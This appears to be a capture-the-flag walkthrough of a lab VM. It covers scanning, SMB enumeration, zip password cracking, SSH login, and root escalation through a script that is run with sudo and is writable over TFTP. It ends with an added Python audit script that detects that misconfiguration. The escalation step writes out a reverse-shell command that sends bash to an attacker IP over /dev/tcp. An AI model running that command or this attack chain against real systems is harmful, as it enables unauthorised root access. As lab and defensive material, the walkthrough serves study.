Lab setup
Download the VM, import it, and it is ready to use.
IP: 192.168.1.136
Penetration process
Initial information gathering
80/udp closed http
123/udp closed ntp
139/udp closed netbios-ssn
161/udp closed snmp
445/udp closed microsoft-ds
2049/udp closed nfs
7/tcp closed echo
22/tcp closed ssh
80/tcp open http
88/tcp closed kerberos-sec
110/tcp open pop3
113/tcp open ident
139/tcp open netbios-ssn
143/tcp open imap
161/tcp closed snmp
389/tcp closed ldap
443/tcp open https
445/tcp open microsoft-ds
993/tcp open imaps
995/tcp open pop3s
1337/tcp closed waste
2049/tcp closed nfs
6000/tcp closed X11
8080/tcp closed http-proxy
22222/tcp open easyengine
54321/tcp closed unknown
The web server hosts a WordPress site.
[07:56:41] 200 - 220B - /.bash_logout
[07:56:41] 200 - 4KB - /.bashrc
[07:56:46] 200 - 807B - /.profile
[07:57:33] 301 - 0B - /index.php -> http://192.168.1.136/
[07:57:38] 200 - 19KB - /license.txt
[07:57:58] 200 - 7KB - /readme.html
[07:58:21] 301 - 178B - /wp-admin -> http://192.168.1.136/wp-admin/
[07:58:22] 301 - 178B - /wp-content -> http://192.168.1.136/wp-content/
[07:58:22] 200 - 1KB - /wp-admin/install.php
[07:58:22] 200 - 0B - /wp-content/
[07:58:22] 200 - 0B - /wp-config.php
[07:58:22] 200 - 69B - /wp-content/plugins/akismet/akismet.php
[07:58:23] 200 - 0B - /wp-cron.php
[07:58:23] 301 - 178B - /wp-includes -> http://192.168.1.136/wp-includes/
[07:58:23] 200 - 0B - /wp-includes/rss-functions.php
Sharename Type Comment
--------- ---- -------
Anonymous Disk
print$ Disk Printer Drivers
sarapublic$ Disk Sara's Public Files
IPC$ IPC IPC Service (vengeance server (Samba, Ubuntu))
S-1-22-1-1000 Unix User\sara (Local User)
S-1-22-1-1001 Unix User\qinyi (Local User)
smbclient //192.168.1.136/sarapublic$
There are some files in the share:
eaurouge.txt N 11 Sun Mar 7 21:46:53 2021
eaurouge N 110 Tue Feb 23 06:06:40 2021
essay.txt N 1257 Mon Mar 8 05:28:34 2021
gio.zip N 11150297 Sun Feb 21 00:48:13 2021
cognac D 0 Tue Feb 23 12:48:47 2021
blurb.txt N 525 Sun Mar 7 21:55:24 2021
champagne D 0 Tue Feb 23 11:15:07 2021
profile.txt N 337 Sun Mar 7 21:45:26 2021
Cracking the zip password
The zip is password-protected. Judging from the wall of text found earlier, the idea is probably to build a wordlist from the information in profile.txt and brute-force the archive with it.
Start a local HTTP server, serve profile.txt through it, and generate the wordlist with cewl.
Use zip2john to produce the hash of the zip, then crack it with john; the password comes out as nanotechnological.
Reading pass_reminder.txt reveals the rule the password follows; combined with the information taken from the PPT, the password assembles to: giovanni_130R_Suzuka
Privilege escalation
SSH is on port 22222. Trying that password to log in works for the qinyi account.
Check the sudo permissions:
User qinyi may run the following commands on vengeance:
(root) NOPASSWD: /bin/systemctl restart nginx, /home/sara/private/eaurouge
qinyi can restart nginx.
qinyi can also run a file in sara's home directory, so sara must be involved somehow. List the processes and filter on "sara":
qinyi@vengeance:~$ ps -ef | grep "sara"
root 972 1 0 11:53 ? 00:00:00 /usr/sbin/in.tftpd --listen --user root --address :69 --secure --create /home/sara/private
There is a TFTP daemon, and it serves exactly that directory, so download the file and see what it does.
┌──(root㉿kali)-[~]
└─# tftp 192.168.1.136 69
tftp> get eaurouge
tftp> quit
Open it and take a look; now it is clear.
┌──(root㉿kali)-[~]
└─# cat eaurouge
#!/bin/bash
touch /home/sara/public/test.txt
echo "Test file" > /home/sara/public/test.txt
chown sara:sara /home/sara/public/test.txt
chmod 644 /home/sara/public/test.txt
Append a reverse shell to it:
┌──(root㉿kali)-[~]
└─# echo "bash -c 'exec bash -i &>/dev/tcp/192.168.1.129/4444 <&1'" >> eaurouge
Then upload it again:
┌──(root㉿kali)-[~]
└─# tftp 192.168.1.136 69
tftp> put eaurouge
tftp> quit
Start a listener, run the file with sudo, and a root shell comes straight back!
Done.
Summary
Information gathering felt quite stuck this time: the useful information is not that obvious and usually needs a second round of processing. That is the annoying part.
I still prefer the brute-force approach; brain-teasers are no fun.
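From the defender's side, the whole chain reduces to one misconfiguration: a sudo NOPASSWD rule that runs a script located in a directory which a root-owned in.tftpd exposes with --create, so anyone on the network can replace the script. The following audit script is an added example and not part of the original writeup; it takes the `sudo -l` and `ps -ef` text shown above as constructed sample input and flags exactly that combination. The list of tftpd options that take a value is an assumption based on tftp-hpa's documented flags.

```python
import re

# tftp-hpa in.tftpd options that consume the next token (assumed list, so those
# values are not mistaken for a served directory).
TFTPD_VALUE_OPTS = {"-a", "--address", "-u", "--user", "-U", "--umask", "-r", "--refuse",
                    "-t", "--timeout", "-T", "--retransmit", "-m", "--map-file",
                    "-B", "--max-blksize", "-R", "--port-range", "-P", "--pidfile"}

# Constructed sample input, copied from the writeup's `sudo -l` and `ps -ef` output.
SUDO_L = """User qinyi may run the following commands on vengeance:
    (root) NOPASSWD: /bin/systemctl restart nginx, /home/sara/private/eaurouge"""
PS_EF = """root  972  1  0 11:53 ?  00:00:00 /usr/sbin/in.tftpd --listen --user root --address :69 --secure --create /home/sara/private
www-data 1201 1100 0 11:54 ? 00:00:00 nginx: worker process"""

def nopasswd_targets(sudo_l: str) -> list[str]:
    """Executable path of every command listed in NOPASSWD rules of `sudo -l` output."""
    targets = []
    for line in sudo_l.splitlines():
        m = re.search(r"NOPASSWD:\s*(.*)", line)
        if m:
            targets += [c.split()[0] for c in m.group(1).split(",") if c.strip()]
    return targets

def tftpd_create_roots(ps_ef: str) -> list[tuple[str, str]]:
    """(served directory, daemon user) for every in.tftpd started with --create/-c,
    i.e. a daemon that lets unauthenticated clients create new files there."""
    roots = []
    for line in ps_ef.splitlines():
        argv = line.split()[7:]          # ps -ef: the CMD column starts at field 8
        if not argv or not argv[0].endswith("in.tftpd"):
            continue
        user, dirs, skip = "nobody", [], False   # tftp-hpa defaults to user nobody
        for i, tok in enumerate(argv[1:], 1):
            if skip:                     # this token is the value of the previous option
                skip = False
                if argv[i - 1] in ("-u", "--user"):
                    user = tok
            elif tok in TFTPD_VALUE_OPTS:
                skip = True
            elif not tok.startswith("-"):
                dirs.append(tok)         # positional argument = served directory
        if "-c" in argv or "--create" in argv:
            roots += [(d, user) for d in dirs]
    return roots

def plantable_sudo_targets(sudo_l: str, ps_ef: str) -> list[dict]:
    """NOPASSWD targets that sit inside a directory a --create tftpd serves:
    the script sudo runs as root can be overwritten over the network."""
    findings = []
    for target in nopasswd_targets(sudo_l):
        for root, user in tftpd_create_roots(ps_ef):
            if target.startswith(root.rstrip("/") + "/"):
                findings.append({"target": target, "tftp_root": root, "tftpd_user": user})
    return findings
```

Removing --create (or dropping the sudo rule, or moving the script outside the served tree) makes the finding disappear, which is the check a hardening pass should repeat afterwards.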